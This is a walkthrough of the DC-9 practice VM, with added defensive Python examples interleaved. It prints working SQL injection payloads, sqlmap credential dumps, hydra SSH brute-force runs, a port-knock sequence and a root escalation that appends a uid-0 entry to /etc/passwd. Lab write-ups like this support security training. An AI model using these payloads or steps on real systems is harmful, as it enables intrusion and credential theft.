DC-9 VM download address
https://www.vulnhub.com/entry/dc-9,412/
VM description
Description
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Credits
A big thanks goes out to the members of @m0tl3ycr3w.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
Lab environment
- Attacker VPS (Kali Linux): ip_addr 172.25.0.69
- DC-9 VM: mac_addr 00:0c:29:b1:3a:71
0x01 Host discovery
Capturing ARP traffic shows that the DC-9 VM's IP address is 172.25.0.71
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
54 Captured ARP Req/Rep packets, from 4 hosts. Total size: 3240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 19 1140 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 17 1020 VMware, Inc.
172.25.0.71 00:0c:29:b1:3a:71 17 1020 VMware, Inc.
172.25.0.100 00:50:56:e5:b3:42 1 60 VMware, Inc.
0x02 Port scan
The target DC-9 has a web service and an SSH service open.
kali@kali:~$ sudo nmap -A -p- 172.25.0.71
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 19:21 EST
Nmap scan report for 172.25.0.71
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B1:3A:71 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 172.25.0.71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds
0x03 Vulnerability discovery and exploitation
Start directly with the web application
The search.php page interacts with a database
Capture the request in Burp Suite to check for SQL injection
The verification process follows; the injection is confirmed!
Run sqlmap against it directly
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D users -T UserDetails --dump
___
__H__
___ ___["]_____ ___ ___ {1.4.2.30#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:46:24 /2020-03-03/
[18:46:25] [INFO] resuming back-end DBMS 'mysql'
[18:46:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:46:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:46:25] [INFO] fetching columns for table 'UserDetails' in database 'users'
[18:46:25] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
[18:46:25] [INFO] table 'users.UserDetails' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\users\UserDetails.csv'
[18:46:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:46:25 /2020-03-03/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D Staff -T Users --dump --thread 1000
___
__H__
___ ___["]_____ ___ ___ {1.4.2.30#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:02 /2020-03-03/
[18:50:03] [INFO] resuming back-end DBMS 'mysql'
[18:50:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:50:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:50:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[18:50:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[18:50:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[18:50:04] [INFO] writing hashes to a temporary file 'C:\Users\Administrator\AppData\Local\Temp\sqlmapo88z6e7110392\sqlmaphashes-cjlb6jp7.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[18:50:05] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[18:50:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[18:50:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[18:50:08] [INFO] starting 4 processes
[18:50:40] [INFO] using suffix '1'
[18:51:12] [INFO] cracked password 'transorbital1' for user 'admin'
Database: Staff
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password | Username |
+--------+--------------------------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin |
+--------+--------------------------------------------------+----------+
[18:51:12] [INFO] table 'Staff.Users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\Staff\Users.csv'
[18:51:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:51:12 /2020-03-03/
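The Staff.Users dump above shows why sqlmap recovered the admin password in under a minute: the stored value is a single unsalted MD5 of the plaintext, so a word list plus the suffix trick sqlmap tried is all it takes. The Python below is an added example (not code from the DC-9 VM or from this write-up) that contrasts that storage scheme with a salted PBKDF2 scheme as an application developer should implement it. The leaked hash value is the one from the dump; the word list is constructed; the 600,000 iteration count follows current OWASP guidance for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os
from typing import Optional

# The admin hash exactly as it appeared in the Staff.Users dump above.
LEAKED_ADMIN_HASH = "856f5de590ef37314e7c3bdf6f8a66dc"

# OWASP's current minimum for PBKDF2-HMAC-SHA256.
PBKDF2_ROUNDS = 600_000


def legacy_md5(password: str) -> str:
    """How the VM stores the admin password: one fast, unsalted MD5 of the plaintext."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_unsalted_md5(digest: str, words, suffixes=("",)) -> Optional[str]:
    """Audit check reproducing sqlmap's dictionary-plus-suffix comparison.

    With no salt and a fast hash every candidate costs one MD5 call (and a
    precomputed table would do even better); that is the weakness being audited.
    """
    for word in words:
        for suffix in suffixes:
            candidate = word + suffix
            if hmac.compare_digest(legacy_md5(candidate), digest):
                return candidate
    return None


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, deliberately slow hash in a self-describing format: algo$rounds$salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored record."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False  # unknown or legacy format: refuse rather than guess
    _, rounds, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed word list: the same word/suffix combination sqlmap reported.
    print(lookup_unsalted_md5(LEAKED_ADMIN_HASH, ["password", "transorbital"], ("", "1")))
    record = hash_password("transorbital1")
    print(record)
    print(verify_password("transorbital1", record), verify_password("transorbital2", record))
```

Two records for the same password differ because each carries its own random salt, so a leaked table cannot be attacked with one precomputed lookup, and each guess costs 600,000 HMAC iterations instead of one MD5.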
利用sql注入漏洞爆出后臺管理賬密
admin:transorbital1
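To make the mechanism concrete, the Python below is an added example, not the VM's results.php and not code from this write-up. It builds a constructed SQLite stand-in for the Staff database, runs the same search once through a string-concatenated query and once through a parameterised one, and feeds both the UNION payload shape sqlmap reported (six columns). Table and column names other than Users/Username/Password are assumptions, the sample rows are constructed, and SQLite has no SLEEP() so only the UNION variant is reproduced.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the VM's Staff database (sample rows, not the real data).

    StaffDetails has six columns, matching the "6 columns" sqlmap reported.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE StaffDetails (
            id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT,
            position TEXT, phone TEXT, email TEXT);
        CREATE TABLE Users (UserID INTEGER PRIMARY KEY, Username TEXT, Password TEXT);
        INSERT INTO StaffDetails VALUES (1, 'Mary', 'Moe', 'Manager', '0412 000 001', 'marym@example.com');
        INSERT INTO StaffDetails VALUES (2, 'Fred', 'Flintstone', 'Quarry', '0412 000 002', 'fredf@example.com');
        INSERT INTO Users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


STAFF_COLUMNS = "firstname, lastname, position, phone, email, id"


def search_vulnerable(conn: sqlite3.Connection, term: str):
    """The results.php pattern: the user-supplied term is spliced into the SQL text,
    so a single quote ends the string literal and the rest becomes SQL."""
    sql = f"SELECT {STAFF_COLUMNS} FROM StaffDetails WHERE lastname LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str):
    """Same query with a bound parameter: the term is data and can never close the literal."""
    sql = f"SELECT {STAFF_COLUMNS} FROM StaffDetails WHERE lastname LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# Same shape as the UNION payload in the sqlmap output: a quote, UNION ALL SELECT
# with six expressions, then a comment that swallows the rest of the original query.
UNION_PAYLOAD = "zzz' UNION ALL SELECT Username, Password, NULL, NULL, NULL, NULL FROM Users-- -"

# Cheap WAF/log heuristic covering the two payload shapes seen above (UNION and SLEEP).
SQLI_MARKERS = re.compile(r"(?i)\bunion\b.*\bselect\b|\bsleep\s*\(|--\s|'\s*(?:and|or)\s+'")


def looks_injected(term: str) -> bool:
    return bool(SQLI_MARKERS.search(term))


if __name__ == "__main__":
    db = build_db()
    print(search_vulnerable(db, "Moe"))
    print(search_vulnerable(db, UNION_PAYLOAD))  # leaks the Users row
    print(search_safe(db, UNION_PAYLOAD))        # nothing: the payload is just a string
    print(looks_injected(UNION_PAYLOAD), looks_injected("Flintstone"))
```

The parameterised query is the actual fix; the regex is only a detection aid for request logs and will miss encoded variants, so it should never be relied on in place of binding parameters.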
使用admin賬號登陸后臺
發(fā)現(xiàn)在search.php和addrecord.php頁面存在本地文件包含漏洞(由于頁底包含頁面顯示文件不存在所以猜測存在本地文件包含)
證實如下
Turn the usernames and passwords collected above into a username list and a password list for the SSH brute force that follows
Brute-force SSH
The brute force does not work, which raises the question of whether a guarding daemon is running
Using the file inclusion vulnerability again confirms that such a daemon exists
What knockd does
In short, it hides the SSH login port (this is the port 22 we saw blocked when scanning ports earlier). Only if we knock on the ports in the configured order does the firewall open the login port; knocking again in the same way makes the firewall close the SSH port. Anyone who does not know the configured knock sequence cannot log in over SSH. We can install knock to open the remote port.
Reading the configuration file shows that knocking ports 7469, 8475 and 9842 in that order opens port 22 for the SSH service
The commands are as follows
nc 172.25.0.71 7469
nc 172.25.0.71 8475
nc 172.25.0.71 9842
Next, use hydra for the password brute force
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:17:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 153 login tries (l:9/p:17), ~10 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:18:18
The brute force gives the following SSH credentials for DC-9
chandlerb:UrAG0D!
janitor:Ilovepeepee
Log in to DC-9 over SSH and gather information
Useful password information is found in janitor's home directory
janitor@dc-9:~$ ls -alh
total 16K
drwx------ 4 janitor janitor 4.0K Mar 3 21:18 .
drwxr-xr-x 19 root root 4.0K Dec 29 20:02 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 21:48 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4.0K Mar 3 21:18 .gnupg
drwx------ 2 janitor janitor 4.0K Dec 29 17:10 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
Add the collected passwords to the password list and brute-force again
kali@kali:~$ hydra -L user.dic -P password.dic 172.25.0.71 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:25:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 230 login tries (l:10/p:23), ~15 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: fredf password: B4-Tru3-001
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
[22][ssh] host: 172.25.0.71 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:26:14
Two more users' passwords are found
login: fredf password: B4-Tru3-001
login: chandlerb password: UrAG0D!
login: janitor password: Ilovepeepee
login: joeyt password: Passw0rd
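Both hydra runs above are easy to spot from the server side: 153 and then 230 login attempts against a handful of accounts from one address in well under a minute. The Python below is an added example, not part of this write-up, that summarises OpenSSH authentication lines per source address and flags both plain brute force (many failures) and password spraying (many distinct usernames), including the case where a success follows the failures. The log lines are constructed in the format of OpenSSH's "Failed password for ..." / "Accepted password for ..." messages; host name, PIDs and ports in them are made up.

```python
import re
from collections import defaultdict

# OpenSSH authentication result lines as they appear in auth.log / journald.
SSH_AUTH_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)"
)

# Constructed sample: a spray from 172.25.0.69 ending in a valid login, plus one
# ordinary typo from another host.
SAMPLE_AUTH_LOG = """\
Mar  3 06:17:51 dc-9 sshd[1201]: Failed password for invalid user marym from 172.25.0.69 port 50212 ssh2
Mar  3 06:17:51 dc-9 sshd[1203]: Failed password for invalid user julied from 172.25.0.69 port 50214 ssh2
Mar  3 06:17:52 dc-9 sshd[1205]: Failed password for fredf from 172.25.0.69 port 50216 ssh2
Mar  3 06:17:52 dc-9 sshd[1207]: Failed password for invalid user barneyr from 172.25.0.69 port 50218 ssh2
Mar  3 06:17:53 dc-9 sshd[1209]: Failed password for chandlerb from 172.25.0.69 port 50220 ssh2
Mar  3 06:17:53 dc-9 sshd[1211]: Accepted password for chandlerb from 172.25.0.69 port 50222 ssh2
Mar  3 06:18:10 dc-9 sshd[1240]: Failed password for janitor from 172.25.0.100 port 40001 ssh2
Mar  3 06:18:14 dc-9 sshd[1242]: Accepted password for janitor from 172.25.0.100 port 40003 ssh2
"""


def summarise(lines):
    """Per source address: failure count, distinct usernames tried, accepted logins."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "accepted": []})
    for line in lines:
        m = SSH_AUTH_RE.search(line)
        if not m:
            continue
        entry = stats[m["src"]]
        if m["result"] == "Failed":
            entry["failed"] += 1
            entry["users"].add(m["user"])
        else:
            entry["accepted"].append(m["user"])
    return dict(stats)


def alerts(lines, max_failures=4, max_users=3):
    """Sources exceeding either threshold, with a reason string for the analyst."""
    out = []
    for src, s in sorted(summarise(lines).items()):
        reasons = []
        if s["failed"] >= max_failures:
            reasons.append(f"{s['failed']} failures")
        if len(s["users"]) >= max_users:
            reasons.append(f"{len(s['users'])} distinct usernames")
        if reasons and s["accepted"]:
            # A success after a spray is the line worth paging on.
            reasons.append("then accepted login for " + ",".join(sorted(set(s["accepted"]))))
        if reasons:
            out.append((src, "; ".join(reasons)))
    return out


if __name__ == "__main__":
    for src, why in alerts(SAMPLE_AUTH_LOG.splitlines()):
        print(src, "->", why)
```

The distinct-username threshold matters here because hydra's l:9/p:17 pattern spreads a few passwords over many accounts, which per-account lockout counters never see; counting per source address does.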
0x04 sudo privilege escalation
Log in to DC-9 over SSH as fredf
fredf is allowed to run a compiled Python script as root
Running it prints a usage message: python test.py with arguments
kali@kali:~$ ssh fredf@172.25.0.71
fredf@172.25.0.71's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 3 21:27:19 2020 from 172.25.0.69
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test
Usage: python test.py read append
Use find to locate the Python source and read it
Briefly, the code opens one file for reading and appends its contents to a second file.
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test.py" 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)
else :
    f = open(sys.argv[1], "r")
    output = (f.read())
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
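The script has two dangerous properties: it reads any file root can read and appends to any path root can write, with no check on either. The Python below is an added example, not the VM's script and not the author's, that keeps the same read-then-append behaviour but confines the destination to an allow-listed directory, resolves symlinks and ".." before the check, opens with O_NOFOLLOW so the file cannot be swapped for a symlink between check and open, and reads the source with the invoking user's privileges so it cannot serve as a read primitive for /etc/shadow either. The directory /opt/devstuff/out, the 1 MiB limit and the scratch-directory demo are assumptions; the demo replays the /etc/passwd append from this write-up against a throwaway copy.

```python
import os
import tempfile
from pathlib import Path

ALLOWED_DEST_DIR = "/opt/devstuff/out"  # hypothetical allow-list; the real script has none
MAX_INPUT_BYTES = 1 << 20               # refuse to copy more than 1 MiB


def read_source(path: str) -> bytes:
    """Read the input with the caller's privileges, not root's (uses sudo's SUDO_UID/GID)."""
    sudo_uid, sudo_gid = os.environ.get("SUDO_UID"), os.environ.get("SUDO_GID")
    drop = os.geteuid() == 0 and sudo_uid is not None and sudo_gid is not None
    if drop:
        os.setegid(int(sudo_gid))  # gid first: after seteuid we could no longer change it
        os.seteuid(int(sudo_uid))
    try:
        with open(path, "rb") as f:
            data = f.read(MAX_INPUT_BYTES + 1)
    finally:
        if drop:
            os.seteuid(0)
            os.setegid(0)
    if len(data) > MAX_INPUT_BYTES:
        raise ValueError("input file too large")
    return data


def checked_dest(path: str, allowed_dir: str) -> Path:
    """Resolve the destination (symlinks and '..' included) and refuse anything outside allowed_dir."""
    dest = Path(path)
    if not dest.is_absolute():
        raise ValueError("destination must be an absolute path")
    base = Path(allowed_dir).resolve()
    resolved = dest.resolve()
    if base not in resolved.parents:
        raise ValueError(f"destination {resolved} is outside {base}")
    return resolved


def append_file(src: str, dst: str, allowed_dir: str = ALLOWED_DEST_DIR) -> int:
    """Append src to dst inside allowed_dir; returns the number of bytes written."""
    data = read_source(src)
    target = checked_dest(dst, allowed_dir)
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(target, flags, 0o640)
    with os.fdopen(fd, "wb") as out:
        return out.write(data)


def demo() -> dict:
    """Exercise the checks in a scratch directory; nothing outside it is touched."""
    root = Path(tempfile.mkdtemp())
    out, etc = root / "out", root / "etc"
    out.mkdir()
    etc.mkdir()
    entry = root / "entry.txt"
    entry.write_bytes(b"whjy:x:0:0::/root:/bin/bash\n")  # constructed passwd line
    passwd = etc / "passwd"
    original = b"root:x:0:0:root:/root:/bin/bash\n"
    passwd.write_bytes(original)
    link = out / "innocent.log"
    link.symlink_to(passwd)  # a symlink placed inside the allowed directory

    def rejected(dst) -> bool:
        try:
            append_file(str(entry), str(dst), str(out))
            return False
        except ValueError:
            return True

    written = append_file(str(entry), str(out / "audit.log"), str(out))
    return {
        "inside_ok": written == len(entry.read_bytes()),
        "direct_rejected": rejected(passwd),
        "dotdot_rejected": rejected(out / ".." / "etc" / "passwd"),
        "symlink_rejected": rejected(link),
        "passwd_untouched": passwd.read_bytes() == original,
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print(append_file(sys.argv[1], sys.argv[2]))
    else:
        print("Usage: python test.py read append")
        print(demo())
```

The sudoers rule is still the root cause: a NOPASSWD entry for a helper that takes arbitrary paths grants whatever that helper can be talked into doing, so the allow-list belongs in the program and the rule should name only helpers that need no such trust.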
This gives us an approach: handcraft a user entry with uid=0, append it to /etc/passwd, and we have root.
The privilege escalation process follows:
Trying to add a root account with no password did not succeed
So openssl is used to generate a hash for the password 123456 (note that the entry appended below has only six colon-separated fields, so /bin/bash lands in the home-directory field and the shell field is empty; that is why su later warns that it cannot change directory to /bin/bash and drops into the default shell)
openssl passwd -1 -salt whjy 123456
fredf@dc-9:/opt/devstuff$ echo zgjy::0:0:::/bin/bash >>/tmp/zgjy
fredf@dc-9:/opt/devstuff$ cd -
/opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test /tmp/zgjy /etc/passwd
Traceback (most recent call last):
File "test.py", line 13, in <module>
PermissionError: [Errno 13] Permission denied: '/etc/passwd'
[3516] Failed to execute script test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/zgjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$ sudo cat /etc/passwd
[sudo] password for fredf:
Sorry, user fredf is not allowed to execute '/usr/bin/cat /etc/passwd' as root on dc-9.
fredf@dc-9:/opt/devstuff/dist/test$ su - zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$
fredf@dc-9:/opt/devstuff/dist/test$ echo 'whjy:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash' >> /tmp/whjy
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/whjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: Authentication failure
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: warning: cannot change directory to /bin/bash: Not a directory
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
bash: /bin/bash/.bashrc: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd ~
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:/root# ls
theflag.txt
root@dc-9:/root# cat thrflag.txt
cat: thrflag.txt: No such file or directory
root@dc-9:/root# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
The sudo privilege escalation succeeded and the flag is captured; the DC series of VMs ends here!